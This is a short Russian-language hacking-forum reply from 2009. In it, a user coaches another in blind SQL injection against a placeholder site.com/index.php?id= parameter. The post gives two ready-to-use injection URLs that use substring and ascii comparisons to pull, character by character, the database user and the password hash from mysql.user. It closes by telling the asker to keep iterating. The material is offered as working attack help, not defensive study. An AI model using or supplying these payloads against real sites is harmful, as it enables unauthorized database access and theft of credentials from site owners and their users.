
23.09.2009, 17:10
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме: 2083691
Репутация:
330
|
|
2Fed123, вашим запросом вы узнали текущего юзера базы данных.
Пробуйте так:
Код:
www.site.com/index.php?id=1+AND+ascii(lower(substring((SELECT+user+from+user+LIMIT+1),1,1)))>1
Код:
www.site.com/index.php?id=1+AND+ascii(lower(substring((SELECT+password+from+mysql.user+WHERE+user="ВАШ ЮЗЕР"+LIMIT+1),1,1)))>1
Ну и так далее перебирайте.
Последний раз редактировалось Ins3t; 23.09.2009 в 19:38..
|
|
|